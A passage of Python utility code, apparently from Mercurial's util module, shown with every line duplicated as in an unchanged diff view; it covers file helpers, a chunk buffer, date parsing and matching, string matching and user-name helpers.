1723 makedir(name, notindexed)
1724 except OSError as err:
1724 except OSError as err:
1725 # Catch EEXIST to handle races
1725 # Catch EEXIST to handle races
1726 if err.errno == errno.EEXIST:
1726 if err.errno == errno.EEXIST:
1727 return
1727 return
1728 raise
1728 raise
1729 if mode is not None:
1729 if mode is not None:
1730 os.chmod(name, mode)
1730 os.chmod(name, mode)
1731
1731
1732 def readfile(path):
1732 def readfile(path):
1733 with open(path, 'rb') as fp:
1733 with open(path, 'rb') as fp:
1734 return fp.read()
1734 return fp.read()
1735
1735
1736 def writefile(path, text):
1736 def writefile(path, text):
1737 with open(path, 'wb') as fp:
1737 with open(path, 'wb') as fp:
1738 fp.write(text)
1738 fp.write(text)
1739
1739
1740 def appendfile(path, text):
1740 def appendfile(path, text):
1741 with open(path, 'ab') as fp:
1741 with open(path, 'ab') as fp:
1742 fp.write(text)
1742 fp.write(text)
1743
1743
1744 class chunkbuffer(object):
1744 class chunkbuffer(object):
1745 """Allow arbitrary sized chunks of data to be efficiently read from an
1745 """Allow arbitrary sized chunks of data to be efficiently read from an
1746 iterator over chunks of arbitrary size."""
1746 iterator over chunks of arbitrary size."""
1747
1747
1748 def __init__(self, in_iter):
1748 def __init__(self, in_iter):
1749 """in_iter is the iterator that's iterating over the input chunks."""
1749 """in_iter is the iterator that's iterating over the input chunks."""
1750 def splitbig(chunks):
1750 def splitbig(chunks):
1751 for chunk in chunks:
1751 for chunk in chunks:
1752 if len(chunk) > 2**20:
1752 if len(chunk) > 2**20:
1753 pos = 0
1753 pos = 0
1754 while pos < len(chunk):
1754 while pos < len(chunk):
1755 end = pos + 2 ** 18
1755 end = pos + 2 ** 18
1756 yield chunk[pos:end]
1756 yield chunk[pos:end]
1757 pos = end
1757 pos = end
1758 else:
1758 else:
1759 yield chunk
1759 yield chunk
1760 self.iter = splitbig(in_iter)
1760 self.iter = splitbig(in_iter)
1761 self._queue = collections.deque()
1761 self._queue = collections.deque()
1762 self._chunkoffset = 0
1762 self._chunkoffset = 0
1763
1763
1764 def read(self, l=None):
1764 def read(self, l=None):
1765 """Read L bytes of data from the iterator of chunks of data.
1765 """Read L bytes of data from the iterator of chunks of data.
1766 Returns less than L bytes if the iterator runs dry.
1766 Returns less than L bytes if the iterator runs dry.
1767
1767
1768 If size parameter is omitted, read everything"""
1768 If size parameter is omitted, read everything"""
1769 if l is None:
1769 if l is None:
1770 return ''.join(self.iter)
1770 return ''.join(self.iter)
1771
1771
1772 left = l
1772 left = l
1773 buf = []
1773 buf = []
1774 queue = self._queue
1774 queue = self._queue
1775 while left > 0:
1775 while left > 0:
1776 # refill the queue
1776 # refill the queue
1777 if not queue:
1777 if not queue:
1778 target = 2**18
1778 target = 2**18
1779 for chunk in self.iter:
1779 for chunk in self.iter:
1780 queue.append(chunk)
1780 queue.append(chunk)
1781 target -= len(chunk)
1781 target -= len(chunk)
1782 if target <= 0:
1782 if target <= 0:
1783 break
1783 break
1784 if not queue:
1784 if not queue:
1785 break
1785 break
1786
1786
1787 # The easy way to do this would be to queue.popleft(), modify the
1787 # The easy way to do this would be to queue.popleft(), modify the
1788 # chunk (if necessary), then queue.appendleft(). However, for cases
1788 # chunk (if necessary), then queue.appendleft(). However, for cases
1789 # where we read partial chunk content, this incurs 2 dequeue
1789 # where we read partial chunk content, this incurs 2 dequeue
1790 # mutations and creates a new str for the remaining chunk in the
1790 # mutations and creates a new str for the remaining chunk in the
1791 # queue. Our code below avoids this overhead.
1791 # queue. Our code below avoids this overhead.
1792
1792
1793 chunk = queue[0]
1793 chunk = queue[0]
1794 chunkl = len(chunk)
1794 chunkl = len(chunk)
1795 offset = self._chunkoffset
1795 offset = self._chunkoffset
1796
1796
1797 # Use full chunk.
1797 # Use full chunk.
1798 if offset == 0 and left >= chunkl:
1798 if offset == 0 and left >= chunkl:
1799 left -= chunkl
1799 left -= chunkl
1800 queue.popleft()
1800 queue.popleft()
1801 buf.append(chunk)
1801 buf.append(chunk)
1802 # self._chunkoffset remains at 0.
1802 # self._chunkoffset remains at 0.
1803 continue
1803 continue
1804
1804
1805 chunkremaining = chunkl - offset
1805 chunkremaining = chunkl - offset
1806
1806
1807 # Use all of unconsumed part of chunk.
1807 # Use all of unconsumed part of chunk.
1808 if left >= chunkremaining:
1808 if left >= chunkremaining:
1809 left -= chunkremaining
1809 left -= chunkremaining
1810 queue.popleft()
1810 queue.popleft()
1811 # offset == 0 is enabled by block above, so this won't merely
1811 # offset == 0 is enabled by block above, so this won't merely
1812 # copy via ``chunk[0:]``.
1812 # copy via ``chunk[0:]``.
1813 buf.append(chunk[offset:])
1813 buf.append(chunk[offset:])
1814 self._chunkoffset = 0
1814 self._chunkoffset = 0
1815
1815
1816 # Partial chunk needed.
1816 # Partial chunk needed.
1817 else:
1817 else:
1818 buf.append(chunk[offset:offset + left])
1818 buf.append(chunk[offset:offset + left])
1819 self._chunkoffset += left
1819 self._chunkoffset += left
1820 left -= chunkremaining
1820 left -= chunkremaining
1821
1821
1822 return ''.join(buf)
1822 return ''.join(buf)
1823
1823
1824 def filechunkiter(f, size=131072, limit=None):
1824 def filechunkiter(f, size=131072, limit=None):
1825 """Create a generator that produces the data in the file size
1825 """Create a generator that produces the data in the file size
1826 (default 131072) bytes at a time, up to optional limit (default is
1826 (default 131072) bytes at a time, up to optional limit (default is
1827 to read all data). Chunks may be less than size bytes if the
1827 to read all data). Chunks may be less than size bytes if the
1828 chunk is the last chunk in the file, or the file is a socket or
1828 chunk is the last chunk in the file, or the file is a socket or
1829 some other type of file that sometimes reads less data than is
1829 some other type of file that sometimes reads less data than is
1830 requested."""
1830 requested."""
1831 assert size >= 0
1831 assert size >= 0
1832 assert limit is None or limit >= 0
1832 assert limit is None or limit >= 0
1833 while True:
1833 while True:
1834 if limit is None:
1834 if limit is None:
1835 nbytes = size
1835 nbytes = size
1836 else:
1836 else:
1837 nbytes = min(limit, size)
1837 nbytes = min(limit, size)
1838 s = nbytes and f.read(nbytes)
1838 s = nbytes and f.read(nbytes)
1839 if not s:
1839 if not s:
1840 break
1840 break
1841 if limit:
1841 if limit:
1842 limit -= len(s)
1842 limit -= len(s)
1843 yield s
1843 yield s
1844
1844
1845 def makedate(timestamp=None):
1845 def makedate(timestamp=None):
1846 '''Return a unix timestamp (or the current time) as a (unixtime,
1846 '''Return a unix timestamp (or the current time) as a (unixtime,
1847 offset) tuple based off the local timezone.'''
1847 offset) tuple based off the local timezone.'''
1848 if timestamp is None:
1848 if timestamp is None:
1849 timestamp = time.time()
1849 timestamp = time.time()
1850 if timestamp < 0:
1850 if timestamp < 0:
1851 hint = _("check your clock")
1851 hint = _("check your clock")
1852 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1852 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1853 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1853 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1854 datetime.datetime.fromtimestamp(timestamp))
1854 datetime.datetime.fromtimestamp(timestamp))
1855 tz = delta.days * 86400 + delta.seconds
1855 tz = delta.days * 86400 + delta.seconds
1856 return timestamp, tz
1856 return timestamp, tz
1857
1857
1858 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1858 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1859 """represent a (unixtime, offset) tuple as a localized time.
1859 """represent a (unixtime, offset) tuple as a localized time.
1860 unixtime is seconds since the epoch, and offset is the time zone's
1860 unixtime is seconds since the epoch, and offset is the time zone's
1861 number of seconds away from UTC.
1861 number of seconds away from UTC.
1862
1862
1863 >>> datestr((0, 0))
1863 >>> datestr((0, 0))
1864 'Thu Jan 01 00:00:00 1970 +0000'
1864 'Thu Jan 01 00:00:00 1970 +0000'
1865 >>> datestr((42, 0))
1865 >>> datestr((42, 0))
1866 'Thu Jan 01 00:00:42 1970 +0000'
1866 'Thu Jan 01 00:00:42 1970 +0000'
1867 >>> datestr((-42, 0))
1867 >>> datestr((-42, 0))
1868 'Wed Dec 31 23:59:18 1969 +0000'
1868 'Wed Dec 31 23:59:18 1969 +0000'
1869 >>> datestr((0x7fffffff, 0))
1869 >>> datestr((0x7fffffff, 0))
1870 'Tue Jan 19 03:14:07 2038 +0000'
1870 'Tue Jan 19 03:14:07 2038 +0000'
1871 >>> datestr((-0x80000000, 0))
1871 >>> datestr((-0x80000000, 0))
1872 'Fri Dec 13 20:45:52 1901 +0000'
1872 'Fri Dec 13 20:45:52 1901 +0000'
1873 """
1873 """
1874 t, tz = date or makedate()
1874 t, tz = date or makedate()
1875 if "%1" in format or "%2" in format or "%z" in format:
1875 if "%1" in format or "%2" in format or "%z" in format:
1876 sign = (tz > 0) and "-" or "+"
1876 sign = (tz > 0) and "-" or "+"
1877 minutes = abs(tz) // 60
1877 minutes = abs(tz) // 60
1878 q, r = divmod(minutes, 60)
1878 q, r = divmod(minutes, 60)
1879 format = format.replace("%z", "%1%2")
1879 format = format.replace("%z", "%1%2")
1880 format = format.replace("%1", "%c%02d" % (sign, q))
1880 format = format.replace("%1", "%c%02d" % (sign, q))
1881 format = format.replace("%2", "%02d" % r)
1881 format = format.replace("%2", "%02d" % r)
1882 d = t - tz
1882 d = t - tz
1883 if d > 0x7fffffff:
1883 if d > 0x7fffffff:
1884 d = 0x7fffffff
1884 d = 0x7fffffff
1885 elif d < -0x80000000:
1885 elif d < -0x80000000:
1886 d = -0x80000000
1886 d = -0x80000000
1887 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1887 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1888 # because they use the gmtime() system call which is buggy on Windows
1888 # because they use the gmtime() system call which is buggy on Windows
1889 # for negative values.
1889 # for negative values.
1890 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1890 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1891 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1891 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1892 return s
1892 return s
1893
1893
1894 def shortdate(date=None):
1894 def shortdate(date=None):
1895 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1895 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1896 return datestr(date, format='%Y-%m-%d')
1896 return datestr(date, format='%Y-%m-%d')
1897
1897
1898 def parsetimezone(s):
1898 def parsetimezone(s):
1899 """find a trailing timezone, if any, in string, and return a
1899 """find a trailing timezone, if any, in string, and return a
1900 (offset, remainder) pair"""
1900 (offset, remainder) pair"""
1901
1901
1902 if s.endswith("GMT") or s.endswith("UTC"):
1902 if s.endswith("GMT") or s.endswith("UTC"):
1903 return 0, s[:-3].rstrip()
1903 return 0, s[:-3].rstrip()
1904
1904
1905 # Unix-style timezones [+-]hhmm
1905 # Unix-style timezones [+-]hhmm
1906 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1906 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1907 sign = (s[-5] == "+") and 1 or -1
1907 sign = (s[-5] == "+") and 1 or -1
1908 hours = int(s[-4:-2])
1908 hours = int(s[-4:-2])
1909 minutes = int(s[-2:])
1909 minutes = int(s[-2:])
1910 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1910 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1911
1911
1912 # ISO8601 trailing Z
1912 # ISO8601 trailing Z
1913 if s.endswith("Z") and s[-2:-1].isdigit():
1913 if s.endswith("Z") and s[-2:-1].isdigit():
1914 return 0, s[:-1]
1914 return 0, s[:-1]
1915
1915
1916 # ISO8601-style [+-]hh:mm
1916 # ISO8601-style [+-]hh:mm
1917 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1917 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1918 s[-5:-3].isdigit() and s[-2:].isdigit()):
1918 s[-5:-3].isdigit() and s[-2:].isdigit()):
1919 sign = (s[-6] == "+") and 1 or -1
1919 sign = (s[-6] == "+") and 1 or -1
1920 hours = int(s[-5:-3])
1920 hours = int(s[-5:-3])
1921 minutes = int(s[-2:])
1921 minutes = int(s[-2:])
1922 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1922 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1923
1923
1924 return None, s
1924 return None, s
1925
1925
1926 def strdate(string, format, defaults=None):
1926 def strdate(string, format, defaults=None):
1927 """parse a localized time string and return a (unixtime, offset) tuple.
1927 """parse a localized time string and return a (unixtime, offset) tuple.
1928 if the string cannot be parsed, ValueError is raised."""
1928 if the string cannot be parsed, ValueError is raised."""
1929 if defaults is None:
1929 if defaults is None:
1930 defaults = {}
1930 defaults = {}
1931
1931
1932 # NOTE: unixtime = localunixtime + offset
1932 # NOTE: unixtime = localunixtime + offset
1933 offset, date = parsetimezone(string)
1933 offset, date = parsetimezone(string)
1934
1934
1935 # add missing elements from defaults
1935 # add missing elements from defaults
1936 usenow = False # default to using biased defaults
1936 usenow = False # default to using biased defaults
1937 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1937 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1938 part = pycompat.bytestr(part)
1938 part = pycompat.bytestr(part)
1939 found = [True for p in part if ("%"+p) in format]
1939 found = [True for p in part if ("%"+p) in format]
1940 if not found:
1940 if not found:
1941 date += "@" + defaults[part][usenow]
1941 date += "@" + defaults[part][usenow]
1942 format += "@%" + part[0]
1942 format += "@%" + part[0]
1943 else:
1943 else:
1944 # We've found a specific time element, less specific time
1944 # We've found a specific time element, less specific time
1945 # elements are relative to today
1945 # elements are relative to today
1946 usenow = True
1946 usenow = True
1947
1947
1948 timetuple = time.strptime(encoding.strfromlocal(date),
1948 timetuple = time.strptime(encoding.strfromlocal(date),
1949 encoding.strfromlocal(format))
1949 encoding.strfromlocal(format))
1950 localunixtime = int(calendar.timegm(timetuple))
1950 localunixtime = int(calendar.timegm(timetuple))
1951 if offset is None:
1951 if offset is None:
1952 # local timezone
1952 # local timezone
1953 unixtime = int(time.mktime(timetuple))
1953 unixtime = int(time.mktime(timetuple))
1954 offset = unixtime - localunixtime
1954 offset = unixtime - localunixtime
1955 else:
1955 else:
1956 unixtime = localunixtime + offset
1956 unixtime = localunixtime + offset
1957 return unixtime, offset
1957 return unixtime, offset
1958
1958
1959 def parsedate(date, formats=None, bias=None):
1959 def parsedate(date, formats=None, bias=None):
1960 """parse a localized date/time and return a (unixtime, offset) tuple.
1960 """parse a localized date/time and return a (unixtime, offset) tuple.
1961
1961
1962 The date may be a "unixtime offset" string or in one of the specified
1962 The date may be a "unixtime offset" string or in one of the specified
1963 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1963 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1964
1964
1965 >>> parsedate(' today ') == parsedate(\
1965 >>> parsedate(' today ') == parsedate(\
1966 datetime.date.today().strftime('%b %d'))
1966 datetime.date.today().strftime('%b %d'))
1967 True
1967 True
1968 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
1968 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
1969 datetime.timedelta(days=1)\
1969 datetime.timedelta(days=1)\
1970 ).strftime('%b %d'))
1970 ).strftime('%b %d'))
1971 True
1971 True
1972 >>> now, tz = makedate()
1972 >>> now, tz = makedate()
1973 >>> strnow, strtz = parsedate('now')
1973 >>> strnow, strtz = parsedate('now')
1974 >>> (strnow - now) < 1
1974 >>> (strnow - now) < 1
1975 True
1975 True
1976 >>> tz == strtz
1976 >>> tz == strtz
1977 True
1977 True
1978 """
1978 """
1979 if bias is None:
1979 if bias is None:
1980 bias = {}
1980 bias = {}
1981 if not date:
1981 if not date:
1982 return 0, 0
1982 return 0, 0
1983 if isinstance(date, tuple) and len(date) == 2:
1983 if isinstance(date, tuple) and len(date) == 2:
1984 return date
1984 return date
1985 if not formats:
1985 if not formats:
1986 formats = defaultdateformats
1986 formats = defaultdateformats
1987 date = date.strip()
1987 date = date.strip()
1988
1988
1989 if date == 'now' or date == _('now'):
1989 if date == 'now' or date == _('now'):
1990 return makedate()
1990 return makedate()
1991 if date == 'today' or date == _('today'):
1991 if date == 'today' or date == _('today'):
1992 date = datetime.date.today().strftime('%b %d')
1992 date = datetime.date.today().strftime('%b %d')
1993 elif date == 'yesterday' or date == _('yesterday'):
1993 elif date == 'yesterday' or date == _('yesterday'):
1994 date = (datetime.date.today() -
1994 date = (datetime.date.today() -
1995 datetime.timedelta(days=1)).strftime('%b %d')
1995 datetime.timedelta(days=1)).strftime('%b %d')
1996
1996
1997 try:
1997 try:
1998 when, offset = map(int, date.split(' '))
1998 when, offset = map(int, date.split(' '))
1999 except ValueError:
1999 except ValueError:
2000 # fill out defaults
2000 # fill out defaults
2001 now = makedate()
2001 now = makedate()
2002 defaults = {}
2002 defaults = {}
2003 for part in ("d", "mb", "yY", "HI", "M", "S"):
2003 for part in ("d", "mb", "yY", "HI", "M", "S"):
2004 # this piece is for rounding the specific end of unknowns
2004 # this piece is for rounding the specific end of unknowns
2005 b = bias.get(part)
2005 b = bias.get(part)
2006 if b is None:
2006 if b is None:
2007 if part[0:1] in "HMS":
2007 if part[0:1] in "HMS":
2008 b = "00"
2008 b = "00"
2009 else:
2009 else:
2010 b = "0"
2010 b = "0"
2011
2011
2012 # this piece is for matching the generic end to today's date
2012 # this piece is for matching the generic end to today's date
2013 n = datestr(now, "%" + part[0:1])
2013 n = datestr(now, "%" + part[0:1])
2014
2014
2015 defaults[part] = (b, n)
2015 defaults[part] = (b, n)
2016
2016
2017 for format in formats:
2017 for format in formats:
2018 try:
2018 try:
2019 when, offset = strdate(date, format, defaults)
2019 when, offset = strdate(date, format, defaults)
2020 except (ValueError, OverflowError):
2020 except (ValueError, OverflowError):
2021 pass
2021 pass
2022 else:
2022 else:
2023 break
2023 break
2024 else:
2024 else:
2025 raise error.ParseError(_('invalid date: %r') % date)
2025 raise error.ParseError(_('invalid date: %r') % date)
2026 # validate explicit (probably user-specified) date and
2026 # validate explicit (probably user-specified) date and
2027 # time zone offset. values must fit in signed 32 bits for
2027 # time zone offset. values must fit in signed 32 bits for
2028 # current 32-bit linux runtimes. timezones go from UTC-12
2028 # current 32-bit linux runtimes. timezones go from UTC-12
2029 # to UTC+14
2029 # to UTC+14
2030 if when < -0x80000000 or when > 0x7fffffff:
2030 if when < -0x80000000 or when > 0x7fffffff:
2031 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2031 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2032 if offset < -50400 or offset > 43200:
2032 if offset < -50400 or offset > 43200:
2033 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2033 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2034 return when, offset
2034 return when, offset
2035
2035
2036 def matchdate(date):
2036 def matchdate(date):
2037 """Return a function that matches a given date match specifier
2037 """Return a function that matches a given date match specifier
2038
2038
2039 Formats include:
2039 Formats include:
2040
2040
2041 '{date}' match a given date to the accuracy provided
2041 '{date}' match a given date to the accuracy provided
2042
2042
2043 '<{date}' on or before a given date
2043 '<{date}' on or before a given date
2044
2044
2045 '>{date}' on or after a given date
2045 '>{date}' on or after a given date
2046
2046
2047 >>> p1 = parsedate("10:29:59")
2047 >>> p1 = parsedate("10:29:59")
2048 >>> p2 = parsedate("10:30:00")
2048 >>> p2 = parsedate("10:30:00")
2049 >>> p3 = parsedate("10:30:59")
2049 >>> p3 = parsedate("10:30:59")
2050 >>> p4 = parsedate("10:31:00")
2050 >>> p4 = parsedate("10:31:00")
2051 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2051 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2052 >>> f = matchdate("10:30")
2052 >>> f = matchdate("10:30")
2053 >>> f(p1[0])
2053 >>> f(p1[0])
2054 False
2054 False
2055 >>> f(p2[0])
2055 >>> f(p2[0])
2056 True
2056 True
2057 >>> f(p3[0])
2057 >>> f(p3[0])
2058 True
2058 True
2059 >>> f(p4[0])
2059 >>> f(p4[0])
2060 False
2060 False
2061 >>> f(p5[0])
2061 >>> f(p5[0])
2062 False
2062 False
2063 """
2063 """
2064
2064
2065 def lower(date):
2065 def lower(date):
2066 d = {'mb': "1", 'd': "1"}
2066 d = {'mb': "1", 'd': "1"}
2067 return parsedate(date, extendeddateformats, d)[0]
2067 return parsedate(date, extendeddateformats, d)[0]
2068
2068
2069 def upper(date):
2069 def upper(date):
2070 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2070 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2071 for days in ("31", "30", "29"):
2071 for days in ("31", "30", "29"):
2072 try:
2072 try:
2073 d["d"] = days
2073 d["d"] = days
2074 return parsedate(date, extendeddateformats, d)[0]
2074 return parsedate(date, extendeddateformats, d)[0]
2075 except Abort:
2075 except Abort:
2076 pass
2076 pass
2077 d["d"] = "28"
2077 d["d"] = "28"
2078 return parsedate(date, extendeddateformats, d)[0]
2078 return parsedate(date, extendeddateformats, d)[0]
2079
2079
2080 date = date.strip()
2080 date = date.strip()
2081
2081
2082 if not date:
2082 if not date:
2083 raise Abort(_("dates cannot consist entirely of whitespace"))
2083 raise Abort(_("dates cannot consist entirely of whitespace"))
2084 elif date[0] == "<":
2084 elif date[0] == "<":
2085 if not date[1:]:
2085 if not date[1:]:
2086 raise Abort(_("invalid day spec, use '<DATE'"))
2086 raise Abort(_("invalid day spec, use '<DATE'"))
2087 when = upper(date[1:])
2087 when = upper(date[1:])
2088 return lambda x: x <= when
2088 return lambda x: x <= when
2089 elif date[0] == ">":
2089 elif date[0] == ">":
2090 if not date[1:]:
2090 if not date[1:]:
2091 raise Abort(_("invalid day spec, use '>DATE'"))
2091 raise Abort(_("invalid day spec, use '>DATE'"))
2092 when = lower(date[1:])
2092 when = lower(date[1:])
2093 return lambda x: x >= when
2093 return lambda x: x >= when
2094 elif date[0] == "-":
2094 elif date[0] == "-":
2095 try:
2095 try:
2096 days = int(date[1:])
2096 days = int(date[1:])
2097 except ValueError:
2097 except ValueError:
2098 raise Abort(_("invalid day spec: %s") % date[1:])
2098 raise Abort(_("invalid day spec: %s") % date[1:])
2099 if days < 0:
2099 if days < 0:
2100 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2100 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2101 % date[1:])
2101 % date[1:])
2102 when = makedate()[0] - days * 3600 * 24
2102 when = makedate()[0] - days * 3600 * 24
2103 return lambda x: x >= when
2103 return lambda x: x >= when
2104 elif " to " in date:
2104 elif " to " in date:
2105 a, b = date.split(" to ")
2105 a, b = date.split(" to ")
2106 start, stop = lower(a), upper(b)
2106 start, stop = lower(a), upper(b)
2107 return lambda x: x >= start and x <= stop
2107 return lambda x: x >= start and x <= stop
2108 else:
2108 else:
2109 start, stop = lower(date), upper(date)
2109 start, stop = lower(date), upper(date)
2110 return lambda x: x >= start and x <= stop
2110 return lambda x: x >= start and x <= stop
2111
2111
2112 def stringmatcher(pattern, casesensitive=True):
2112 def stringmatcher(pattern, casesensitive=True):
2113 """
2113 """
2114 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2114 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2115 returns the matcher name, pattern, and matcher function.
2115 returns the matcher name, pattern, and matcher function.
2116 missing or unknown prefixes are treated as literal matches.
2116 missing or unknown prefixes are treated as literal matches.
2117
2117
2118 helper for tests:
2118 helper for tests:
2119 >>> def test(pattern, *tests):
2119 >>> def test(pattern, *tests):
2120 ... kind, pattern, matcher = stringmatcher(pattern)
2120 ... kind, pattern, matcher = stringmatcher(pattern)
2121 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2121 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2122 >>> def itest(pattern, *tests):
2122 >>> def itest(pattern, *tests):
2123 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2123 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2124 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2124 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2125
2125
2126 exact matching (no prefix):
2126 exact matching (no prefix):
2127 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2127 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2128 ('literal', 'abcdefg', [False, False, True])
2128 ('literal', 'abcdefg', [False, False, True])
2129
2129
2130 regex matching ('re:' prefix)
2130 regex matching ('re:' prefix)
2131 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2131 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2132 ('re', 'a.+b', [False, False, True])
2132 ('re', 'a.+b', [False, False, True])
2133
2133
2134 force exact matches ('literal:' prefix)
2134 force exact matches ('literal:' prefix)
2135 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2135 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2136 ('literal', 're:foobar', [False, True])
2136 ('literal', 're:foobar', [False, True])
2137
2137
2138 unknown prefixes are ignored and treated as literals
2138 unknown prefixes are ignored and treated as literals
2139 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2139 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2140 ('literal', 'foo:bar', [False, False, True])
2140 ('literal', 'foo:bar', [False, False, True])
2141
2141
2142 case insensitive regex matches
2142 case insensitive regex matches
2143 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2143 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2144 ('re', 'A.+b', [False, False, True])
2144 ('re', 'A.+b', [False, False, True])
2145
2145
2146 case insensitive literal matches
2146 case insensitive literal matches
2147 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2147 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2148 ('literal', 'ABCDEFG', [False, False, True])
2148 ('literal', 'ABCDEFG', [False, False, True])
2149 """
2149 """
2150 if pattern.startswith('re:'):
2150 if pattern.startswith('re:'):
2151 pattern = pattern[3:]
2151 pattern = pattern[3:]
2152 try:
2152 try:
2153 flags = 0
2153 flags = 0
2154 if not casesensitive:
2154 if not casesensitive:
2155 flags = remod.I
2155 flags = remod.I
2156 regex = remod.compile(pattern, flags)
2156 regex = remod.compile(pattern, flags)
2157 except remod.error as e:
2157 except remod.error as e:
2158 raise error.ParseError(_('invalid regular expression: %s')
2158 raise error.ParseError(_('invalid regular expression: %s')
2159 % e)
2159 % e)
2160 return 're', pattern, regex.search
2160 return 're', pattern, regex.search
2161 elif pattern.startswith('literal:'):
2161 elif pattern.startswith('literal:'):
2162 pattern = pattern[8:]
2162 pattern = pattern[8:]
2163
2163
2164 match = pattern.__eq__
2164 match = pattern.__eq__
2165
2165
2166 if not casesensitive:
2166 if not casesensitive:
2167 ipat = encoding.lower(pattern)
2167 ipat = encoding.lower(pattern)
2168 match = lambda s: ipat == encoding.lower(s)
2168 match = lambda s: ipat == encoding.lower(s)
2169 return 'literal', pattern, match
2169 return 'literal', pattern, match
2170
2170
2171 def shortuser(user):
2171 def shortuser(user):
2172 """Return a short representation of a user name or email address."""
2172 """Return a short representation of a user name or email address."""
2173 f = user.find('@')
2173 f = user.find('@')
2174 if f >= 0:
2174 if f >= 0:
2175 user = user[:f]
2175 user = user[:f]
2176 f = user.find('<')
2176 f = user.find('<')
2177 if f >= 0:
2177 if f >= 0:
2178 user = user[f + 1:]
2178 user = user[f + 1:]
2179 f = user.find(' ')
2179 f = user.find(' ')
2180 if f >= 0:
2180 if f >= 0:
2181 user = user[:f]
2181 user = user[:f]
2182 f = user.find('.')
2182 f = user.find('.')
2183 if f >= 0:
2183 if f >= 0:
2184 user = user[:f]
2184 user = user[:f]
2185 return user
2185 return user
2186
2186
2187 def emailuser(user):
2187 def emailuser(user):
2188 """Return the user portion of an email address."""
2188 """Return the user portion of an email address."""
2189 f = user.find('@')
2189 f = user.find('@')
2190 if f >= 0:
2190 if f >= 0:
2191 user = user[:f]
2191 user = user[:f]
2192 f = user.find('<')
2192 f = user.find('<')
2193 if f >= 0:
2193 if f >= 0:
2194 user = user[f + 1:]
2194 user = user[f + 1:]
2195 return user
2195 return user
2196
2196
2197 def email(author):
2197 def email(author):
2198 '''get email of author.'''
2198 '''get email of author.'''
2199 r = author.find('>')
2199 r = author.find('>')
2200 if r == -1:
2200 if r == -1:
2201 r = None
2201 r = None
2202 return author[author.find('<') + 1:r]
2202 return author[author.find('<') + 1:r]
2203
2203
2204 def ellipsis(text, maxlength=400):
2204 def ellipsis(text, maxlength=400):
2205 """Trim string to at most maxlength (default: 400) columns in display."""
2205 """Trim string to at most maxlength (default: 400) columns in display."""
2206 return encoding.trim(text, maxlength, ellipsis='...')
2206 return encoding.trim(text, maxlength, ellipsis='...')
2207
2207
2208 def unitcountfn(*unittable):
2208 def unitcountfn(*unittable):
2209 '''return a function that renders a readable count of some quantity'''
2209 '''return a function that renders a readable count of some quantity'''
2210
2210
2211 def go(count):
2211 def go(count):
2212 for multiplier, divisor, format in unittable:
2212 for multiplier, divisor, format in unittable:
2213 if abs(count) >= divisor * multiplier:
2213 if abs(count) >= divisor * multiplier:
2214 return format % (count / float(divisor))
2214 return format % (count / float(divisor))
2215 return unittable[-1][2] % count
2215 return unittable[-1][2] % count
2216
2216
2217 return go
2217 return go
2218
2218
2219 def processlinerange(fromline, toline):
2219 def processlinerange(fromline, toline):
2220 """Check that linerange <fromline>:<toline> makes sense and return a
2220 """Check that linerange <fromline>:<toline> makes sense and return a
2221 0-based range.
2221 0-based range.
2222
2222
2223 >>> processlinerange(10, 20)
2223 >>> processlinerange(10, 20)
2224 (9, 20)
2224 (9, 20)
